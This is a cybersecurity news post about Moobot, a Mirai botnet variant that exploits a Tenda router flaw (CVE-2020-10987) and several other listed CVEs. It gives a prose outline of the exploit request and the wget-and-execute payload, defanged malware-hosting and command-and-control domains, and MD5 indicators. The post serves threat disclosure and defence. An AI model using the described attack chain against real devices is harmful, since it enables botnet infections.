Posted on Leave a comment

Mirai Botnet is back. This Time its Targeting Multiple Vulnerabilities.

Alien Lab researchers from AT&T have identified a new Mirai variant which is scanning for uncommon security vulnerabilities in internet on Tenda routers.

This variant which is dubbed “Moobot” has seen to be delivered via new malware hosting domain named “Cyberium”. Alien labs revealed that this was observed due to the peak in exploitation attempts for the Remote Code Execution vulnerability(CVE-2020-10987) on Tenda .

“This exploit can be identified by the URL that is requested, which includes ‘setUsbUnload’ with the payload assigned to the vulnerable parameter ‘deviceName’. This payload contains the logic to change the execution path to a temporary location, wget a file from a malware hosting page, provide execution permissions, and execute it.” stated in the AT&T blog.

BinaryEdge sensor

Alien labs researchers confirmed that scan for Tenda routers lasted for a day, however the scanning activities continued for multiple weeks for the below listed vulnerabilities on different products.

  • Port 80 and 8080: Axis SSI RCE.
  • Port 34567: DVR scanner attempting default credentials for Sofia main video application.
  • Port 37215: Huawei Home routers RCE Vulnerability (CVE-2017-17215).
  • Port 52869: Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361).

“All of them appeared to be pulling their next iteration of the malware from the same malware hosting page: dns.cyberium[.]cc.” stated in the Alien labs blog.

The full list of subdomains/campaigns identified from this domain is:

  • Snoopy.cyberium[.]cc: Around May 2020
  • U.cyberium[.]cc: Around May 2020
  • Gcc.cyberium[.]cc: Around June 2020
  • Park.cyberium[.]cc: Around July 2020
  • Hoon.cyberium[.]cc: Around July 2020
  • Hh.cyberium[.]cc: Around September 2020
  • Wo.cyberium[.]cc: Around October 2020
  • Y.cyberium[.]cc: Around October 2020
  • W.cyberium[.]cc: Around November 2020
  • Ns.cyberium[.]cc: Around November 2020
  • Tmp.cyberium[.]cc: Around December 2020
  • Ftp.cyberium[.]cc: Around March 2021
  • Dns.cyberium[.]cc: Around April 2021
  • Ddns.cyberium[.]cc: Around April 2021

Other infrastructure which is controlled by the same actor and has been used as Moobot command and control centre.

  • Park.allcheesedout[.]cc: around September 2020
  • Ratatouille.allcheesedout[.]cc: around September 2020
  • Watchdog.allcheesedout[.]cc: around September 2020
  • Bot.bigbots[.]cc: around February 2021
  • Cnc.bigbots[.]cc: around February 2021
  • Cnc1.bigbots[.]cc: around February 2021
  • Cnc.fewbots[.]cc: created and up since February 2021
  • Bot.fewbots[.]cc: created and up since February 2021
  • Cnc.hardbotz[.]cc: created and up since March 2021
  • Projectaliennet[.]cc: created and up since March 2021
  • Life.zerobytes[.]cc: created on May 2021

Indicators of Compromise:

TYPEINDICATOR Sample names
DOMAINcyberium[.]cc Malicious domain
MD5fbdc24f589e99088cec5fc77257c81f3 Moobot
MD578ecbd418cac0a1af9feb860fceae2f9 Satori
MD514c629f43d3e05615ea1b25d3e4aa1fa Unassigned variant
MD5555821a5f67d064362e8ce9a48b95d56 Fbot with UPX

-–For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1

Leave a Reply